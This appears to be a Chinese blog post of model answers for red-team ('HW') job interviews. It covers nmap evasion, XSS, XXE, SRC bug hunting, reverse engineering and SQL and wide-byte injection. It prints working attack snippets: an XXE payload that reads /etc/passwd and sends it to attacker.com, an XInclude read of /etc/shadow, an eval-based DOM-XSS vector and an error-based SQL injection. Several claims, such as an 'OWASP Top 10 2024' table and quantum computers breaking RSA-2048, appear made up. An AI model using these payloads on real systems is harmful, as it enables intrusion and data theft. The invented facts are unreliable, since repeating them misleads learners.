广州建设网站的公司简介百度账户

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

 2025年HW(护网面试) 41

1. 自我介绍

2. Nmap 高阶命令速查表

3. 2025主流漏洞扫描工具

4. OWASP Top 10 2024

5. XSS攻防新趋势（2025）

6. HTTP协议核心字段升级

7. XXE高级利用技术

8. SRC实战经验

9. 二进制安全能力矩阵

10. SQL注入原理新解

11. 宽字节注入深度剖析

 2025年HW(护网面试) 41

1、自我介绍
2、常用的nmap命令是什么
3、常用的漏洞扫描工具有哪些
4、了解owasp top10吗？有哪些
5、xss
6、http协议吗？有什么字段？
7、xxe
8、挖过src吗
9、了解逆向吗，对二进制熟悉吗
10、sql注入的原理是什么
11、宽字节注入的原理是什么

1. 自我介绍

安全工程专家 | 5年红队经验 | SRC Top 100

🔹 核心能力：

• 渗透测试：主导金融/政务系统渗透项目12个，发现高危漏洞36个（含3个0day）
• 代码审计：深度掌握Java/Python框架漏洞链（Spring RCE/Flask SSTI）
• 工具开发：开源项目PyScanner 获GitHub 3.2k stars
• 荣誉认证：OSCP/OSCE双认证 | 2024年护网行动省级专家组成员

---

2. Nmap 高阶命令速查表

场景	命令组合	技术解析
隐蔽扫描	nmap -sS -T2 --scan-delay 30s -D RND:5	延时扫描+IP池欺骗
漏洞探测	nmap -p443 --script http-shellshock --script-args uri=/cgi-bin/test	精准检测Shellshock漏洞
内网穿透	nmap -sA -Pn -n --traceroute -g 8080	基于TCP ACK的防火墙穿透
指纹伪装	nmap -sV --script=http-fake404 --spoof-mac Cisco	伪造Mac地址与错误响应

---

3. 2025主流漏洞扫描工具

自动化工具：

• Nexpose：企业级资产管理+漏洞优先级（整合MITRE ATT&CK）
• Burp Suite Pro：插件生态支持0day检测（如Log4j内存马扫描）
• Semgrep：代码静态分析（覆盖Spring/Flask框架）

武器化工具：

• Cobalt Strike：Beacon通信支持HTTP/3(QUIC)协议
• Metasploit：集成AI漏洞利用模块（自动生成绕过EXP）

---

4. OWASP Top 10 2024

风险项	典型案例	防御方案
失效访问控制	JWT权限校验缺失导致数据越权	RBAC模型+动态权限校验
加密机制缺陷	量子计算机破解RSA-2048	迁移至抗量子算法（CRYSTALS-Kyber）
Serverless风险	AWS Lambda环境变量泄露AccessKey	硬件安全模块（HSM）存储密钥

---

5. XSS攻防新趋势（2025）

攻击进化：

javascript// 新型DOM-XSS向量 const payload = `${location.hash.slice(1)}`; eval?.(`${decodeURIComponent(payload)}`);

防御方案：

• CSP 3.0：script-src 'nonce-xxx'动态令牌
• 浏览器沙盒：Chromium V8 Isolate内存隔离
• AI过滤引擎：深度学习识别混淆脚本（误报率<0.1%）

---

6. HTTP协议核心字段升级

协议版本	关键字段	安全意义
HTTP/2	:method :authority	标头压缩防CRIME攻击
HTTP/3	Alt-Svc（QUIC支持）	UDP多路复用抗DDoS
新标头	Sec-Purpose: prefetch	控制预加载资源防XS-Leaks

---

7. XXE高级利用技术

xml<!ENTITY % exfil SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % trigger SYSTEM "http://attacker.com/?data=%exfil;"> 

绕过技巧：

• UTF-7编码：<?xml version="1.0" encoding="UTF-7"?>
• XInclude攻击：<xi:include parse="text" href="file:///etc/shadow"/>
  防御方案：
• SAX解析器替代DOM
• XML防火墙正则过滤<!ENTITY

---

8. SRC实战经验

挖洞策略：

1. 目标选择：新上线系统/第三方组件（如视频会议SDK）
2. 入口发现：
   • JS文件分析：/api/v1/swagger.json
   • 子域名接管：*.test.com CNAME指向失效S3桶
3. 漏洞转化：SSRF→云元数据泄露→接管控制台

成果数据：

• 年度提交漏洞：27个高危（单笔最高奖金¥50,000）
• 0day案例：某OA系统Velocity模板注入（CVE-2025-XXXX）

---

9. 二进制安全能力矩阵

方向	掌握深度	实战案例
逆向工程	IDA Pro插件开发/Frida动态Hook	某银行APP证书锁定绕过
漏洞挖掘	AFL++模糊测试（覆盖率导向）	发现OpenSSL堆溢出（CVE-2024-XXXX）
恶意代码	x64 Shellcode编写/PE文件免杀	红队载荷绕过EDR静态检测

---

10. SQL注入原理新解

现代攻击向量：

sqlSELECT * FROM users WHERE id = 1 AND EXTRACTVALUE(1, CONCAT(0x7e,(VERSION()))) -- 报错注入 

2025防御体系：

1. 开发层：
   • SQL语法树分析（拦截非常规结构）
   • ORM框架强制类型绑定
2. 硬件层：
   • 数据库防火墙（基于FPGA的协议解析加速）
   • 内存计算隔离（Intel SGX加密查询过程）

---

11. 宽字节注入深度剖析

mermaidgraph LR A[输入'] --> B[转义为\' ] B --> C[GBK编码：%5C%27] C --> D[%BF%5C → 汉字"縗"] D --> E[单引号逃逸成功]

现代防御方案：

• 统一字符集：全栈强制UTF-8编码
• 转义策略：mysql_real_escape_string() + 预处理语句
• WAF规则：检测异常编码序列（如%BF%27）